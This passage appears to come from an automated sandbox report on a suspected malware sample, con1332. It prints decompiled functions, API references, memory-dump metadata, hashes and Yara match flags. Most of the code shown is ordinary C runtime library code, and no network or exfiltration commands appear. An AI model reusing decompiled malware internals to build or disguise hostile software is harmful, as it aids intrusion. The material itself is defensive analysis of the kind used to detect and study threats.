                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE ref: 046B9D27
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2591292051-0
                                                                                                                                                                                                                                    • Opcode ID: f310a61d157b8196db919fd448d569061c1127b564f5fa8f0fad08d24f071b63
                                                                                                                                                                                                                                    • Instruction ID: f6b4843d601395107c88666895ed965847e799e0cc9d6e4f1669c71a29fc39e0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f310a61d157b8196db919fd448d569061c1127b564f5fa8f0fad08d24f071b63
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 171148B58002098FDB20CF9AC944BDEFBF4EF48324F10845AD558A3250D778A984CFA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 046B9ED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 422 46b9ed8-46b9f44 ImpersonateLoggedOnUser 424 46b9f4d-46b9f6e 422->424 425 46b9f46-46b9f4c 422->425 425->424
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ImpersonateLoggedOnUser.KERNELBASE ref: 046B9F37
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.328590613.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_46b0000_con1332.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2216092060-0
                                                                                                                                                                                                                                    • Opcode ID: 119d9923c2b769d1e7059f9ba7aede2255e389720d43df10d63f6d1a27c8e64b
                                                                                                                                                                                                                                    • Instruction ID: 6364a3a93dd7cd11a233e7deb3f9eca6f649b11fea964167878f54d64b699049
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 119d9923c2b769d1e7059f9ba7aede2255e389720d43df10d63f6d1a27c8e64b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B1136B1800209CFDB20CF9AC944BDEBBF8EF48324F10845AD558A3250D778A985CFA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E0040D534(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4234b4 = _t6;
				if(_t6 != 0) {
					 *0x4250b0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                                                                                                                                    0x0040d549
                                                                                                                                                                                                                                    0x0040d54f
                                                                                                                                                                                                                                    0x0040d556
                                                                                                                                                                                                                                    0x0040d55d
                                                                                                                                                                                                                                    0x0040d563
                                                                                                                                                                                                                                    0x0040d559
                                                                                                                                                                                                                                    0x0040d559
                                                                                                                                                                                                                                    0x0040d559

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                                                                                                                    • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                                                    • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                                                                                    			E0040EA0A(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}









                                                                                                                                                                                                                                    0x0040ea0f
                                                                                                                                                                                                                                    0x0040ea11
                                                                                                                                                                                                                                    0x0040ea13
                                                                                                                                                                                                                                    0x0040ea16
                                                                                                                                                                                                                                    0x0040ea1f

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                                                      • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1597249276-0
                                                                                                                                                                                                                                    • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                                                    • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BF0920 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02BF0929
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ProcessTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 560597551-0
                                                                                                                                                                                                                                    • Opcode ID: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                                                                                                                                                                    • Instruction ID: f1a77b98683cafb1fb7459b4dcf7902f75ab8b99c0f73db378513641b05b932d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a81f69529bcf2872433a6626b6dddab0307a3207cad9c1e7665d850a07e5ea8b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1190026038415011D820259C4C02B0510021751634F3047107170B91D4D84496144126
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                    			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x422234; // 0x9dd62c7d
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x423b98 = _t6;
				 *0x423b94 = _t22;
				 *0x423b90 = _t25;
				 *0x423b8c = _t21;
				 *0x423b88 = _t27;
				 *0x423b84 = _t26;
				 *0x423bb0 = ss;
				 *0x423ba4 = cs;
				 *0x423b80 = ds;
				 *0x423b7c = es;
				 *0x423b78 = fs;
				 *0x423b74 = gs;
				asm("pushfd");
				_pop( *0x423ba8);
				 *0x423b9c =  *_t31;
				 *0x423ba0 = _v0;
				 *0x423bac =  &_a4;
				 *0x423ae8 = 0x10001;
				_t11 =  *0x423ba0; // 0x0
				 *0x423a9c = _t11;
				 *0x423a90 = 0xc0000409;
				 *0x423a94 = 1;
				_t12 =  *0x422234; // 0x9dd62c7d
				_v812 = _t12;
				_t13 =  *0x422238; // 0x6229d382
				_v808 = _t13;
				 *0x423ae0 = IsDebuggerPresent();
				_push(1);
				E004138FC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x41fb80);
				if( *0x423ae0 == 0) {
					_push(1);
					E004138FC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                                                    0x0040ce09
                                                                                                                                                                                                                                    0x0040ce0f
                                                                                                                                                                                                                                    0x0040ce11
                                                                                                                                                                                                                                    0x0040ce11
                                                                                                                                                                                                                                    0x00413644
                                                                                                                                                                                                                                    0x00413649
                                                                                                                                                                                                                                    0x0041364f
                                                                                                                                                                                                                                    0x00413655
                                                                                                                                                                                                                                    0x0041365b
                                                                                                                                                                                                                                    0x00413661
                                                                                                                                                                                                                                    0x00413667
                                                                                                                                                                                                                                    0x0041366e
                                                                                                                                                                                                                                    0x00413675
                                                                                                                                                                                                                                    0x0041367c
                                                                                                                                                                                                                                    0x00413683
                                                                                                                                                                                                                                    0x0041368a
                                                                                                                                                                                                                                    0x00413691
                                                                                                                                                                                                                                    0x00413692
                                                                                                                                                                                                                                    0x0041369b
                                                                                                                                                                                                                                    0x004136a3
                                                                                                                                                                                                                                    0x004136ab
                                                                                                                                                                                                                                    0x004136b6
                                                                                                                                                                                                                                    0x004136c0
                                                                                                                                                                                                                                    0x004136c5
                                                                                                                                                                                                                                    0x004136ca
                                                                                                                                                                                                                                    0x004136d4
                                                                                                                                                                                                                                    0x004136de
                                                                                                                                                                                                                                    0x004136e3
                                                                                                                                                                                                                                    0x004136e9
                                                                                                                                                                                                                                    0x004136ee
                                                                                                                                                                                                                                    0x004136fa
                                                                                                                                                                                                                                    0x004136ff
                                                                                                                                                                                                                                    0x00413701
                                                                                                                                                                                                                                    0x00413709
                                                                                                                                                                                                                                    0x00413714
                                                                                                                                                                                                                                    0x00413721
                                                                                                                                                                                                                                    0x00413723
                                                                                                                                                                                                                                    0x00413725
                                                                                                                                                                                                                                    0x0041372a
                                                                                                                                                                                                                                    0x0041373e

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                    • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                    • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02BFD070 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 02C0395B
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02C03970
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 02C0397B
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 02C03997
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 02C0399E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                    • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                    • Instruction ID: 4bb2fd2524325f1f97171cfd17261fc98ad2e92218bd90dfaeb189217573c187
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121D4B8B01204EFD720DF65E9496457FB4FB08356F8040BAE50D87662E7B86682CF4D
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E0040ADB0(intOrPtr* __ecx) {
				void* _t5;
				intOrPtr* _t11;

				_t11 = __ecx;
				_t5 =  *(__ecx + 8);
				 *__ecx = 0x41eff0;
				if(_t5 != 0) {
					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
				}
				if( *(_t11 + 0xc) != 0) {
					_t5 = GetProcessHeap();
					if(_t5 != 0) {
						return HeapFree(_t5, 0,  *(_t11 + 0xc));
					}
				}
				return _t5;
			}





                                                                                                                                                                                                                                    0x0040adb3
                                                                                                                                                                                                                                    0x0040adb5
                                                                                                                                                                                                                                    0x0040adb8
                                                                                                                                                                                                                                    0x0040adc0
                                                                                                                                                                                                                                    0x0040adc8
                                                                                                                                                                                                                                    0x0040adc8
                                                                                                                                                                                                                                    0x0040adce
                                                                                                                                                                                                                                    0x0040add0
                                                                                                                                                                                                                                    0x0040add8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040ade1
                                                                                                                                                                                                                                    0x0040add8
                                                                                                                                                                                                                                    0x0040ade8

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                                                    • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                    • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				short* _t115;
				short* _t116;
				char* _t120;
				short* _t121;
				short* _t123;
				short* _t127;
				int _t128;
				short* _t141;
				signed int _t144;
				void* _t146;
				short* _t147;
				signed int _t150;
				short* _t153;
				char* _t157;
				int _t160;
				long _t162;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				int _t182;
				short* _t184;
				signed int _t186;
				signed int _t188;
				short* _t189;
				int _t191;
				intOrPtr _t194;
				int _t207;

				_t110 =  *0x422234; // 0x9dd62c7d
				_v8 = _t110 ^ _t188;
				_t184 = __ecx;
				_t194 =  *0x423e7c; // 0x1
				if(_t194 == 0) {
					_t182 = 1;
					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
						_t162 = GetLastError();
						__eflags = _t162 - 0x78;
						if(_t162 == 0x78) {
							 *0x423e7c = 2;
						}
					} else {
						 *0x423e7c = 1;
					}
				}
				if(_a16 <= 0) {
					L13:
					_t112 =  *0x423e7c; // 0x1
					if(_t112 == 2 || _t112 == 0) {
						_v16 = 0;
						_v20 = 0;
						__eflags = _a4;
						if(_a4 == 0) {
							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
						}
						__eflags = _a28;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
						_v24 = _t113;
						__eflags = _t113 - 0xffffffff;
						if(_t113 != 0xffffffff) {
							__eflags = _t113 - _a28;
							if(_t113 == _a28) {
								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
								L78:
								__eflags = _v16;
								if(__eflags != 0) {
									_push(_v16);
									E0040B6B5(0, _t182, _t184, __eflags);
								}
								_t115 = _v20;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags = _a20 - _t115;
									if(__eflags != 0) {
										_push(_t115);
										E0040B6B5(0, _t182, _t184, __eflags);
									}
								}
								_t116 = _t184;
								goto L84;
							}
							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
							_t191 =  &(_t189[0xc]);
							_v16 = _t120;
							__eflags = _t120;
							if(_t120 == 0) {
								goto L58;
							}
							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
							_v12 = _t121;
							__eflags = _t121;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									L71:
									_t182 = 0;
									__eflags = 0;
									L72:
									__eflags = _t182;
									if(_t182 == 0) {
										goto L62;
									}
									E0040BA30(_t182, _t182, 0, _v12);
									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
									_v12 = _t123;
									__eflags = _t123;
									if(_t123 != 0) {
										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
										_v20 = _t186;
										asm("sbb esi, esi");
										_t184 =  ~_t186 & _v12;
										__eflags = _t184;
									} else {
										_t184 = 0;
									}
									E004147AE(_t182);
									goto L78;
								}
								__eflags = _t121 - 0xffffffe0;
								if(_t121 > 0xffffffe0) {
									goto L71;
								}
								_t127 =  &(_t121[4]);
								__eflags = _t127 - 0x400;
								if(_t127 > 0x400) {
									_t128 = E0040B84D(0, _t179, _t182, _t127);
									__eflags = _t128;
									if(_t128 != 0) {
										 *_t128 = 0xdddd;
										_t128 = _t128 + 8;
										__eflags = _t128;
									}
									_t182 = _t128;
									goto L72;
								}
								E0040CFB0(_t127);
								_t182 = _t191;
								__eflags = _t182;
								if(_t182 == 0) {
									goto L62;
								}
								 *_t182 = 0xcccc;
								_t182 = _t182 + 8;
								goto L72;
							}
							L62:
							_t184 = 0;
							goto L78;
						} else {
							goto L58;
						}
					} else {
						if(_t112 != 1) {
							L58:
							_t116 = 0;
							L84:
							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
						}
						_v12 = 0;
						if(_a28 == 0) {
							_a28 =  *((intOrPtr*)( *_t184 + 4));
						}
						_t184 = MultiByteToWideChar;
						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
						_t207 = _t182;
						if(_t207 == 0) {
							goto L58;
						} else {
							if(_t207 <= 0) {
								L28:
								_v16 = 0;
								L29:
								if(_v16 == 0) {
									goto L58;
								}
								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
									L52:
									E004147AE(_v16);
									_t116 = _v12;
									goto L84;
								}
								_t184 = LCMapStringW;
								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
								_v12 = _t174;
								if(_t174 == 0) {
									goto L52;
								}
								if((_a8 & 0x00000400) == 0) {
									__eflags = _t174;
									if(_t174 <= 0) {
										L44:
										_t184 = 0;
										__eflags = 0;
										L45:
										__eflags = _t184;
										if(_t184 != 0) {
											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
											__eflags = _t141;
											if(_t141 != 0) {
												_push(0);
												_push(0);
												__eflags = _a24;
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
											}
											E004147AE(_t184);
										}
										goto L52;
									}
									_t144 = 0xffffffe0;
									_t179 = _t144 % _t174;
									__eflags = _t144 / _t174 - 2;
									if(_t144 / _t174 < 2) {
										goto L44;
									}
									_t52 = _t174 + 8; // 0x8
									_t146 = _t174 + _t52;
									__eflags = _t146 - 0x400;
									if(_t146 > 0x400) {
										_t147 = E0040B84D(0, _t179, _t182, _t146);
										__eflags = _t147;
										if(_t147 != 0) {
											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}











































                                                                                                                                                                                                                                    0x00417089
                                                                                                                                                                                                                                    0x00417090
                                                                                                                                                                                                                                    0x00417098
                                                                                                                                                                                                                                    0x0041709a
                                                                                                                                                                                                                                    0x004170a0
                                                                                                                                                                                                                                    0x004170a6
                                                                                                                                                                                                                                    0x004170bb
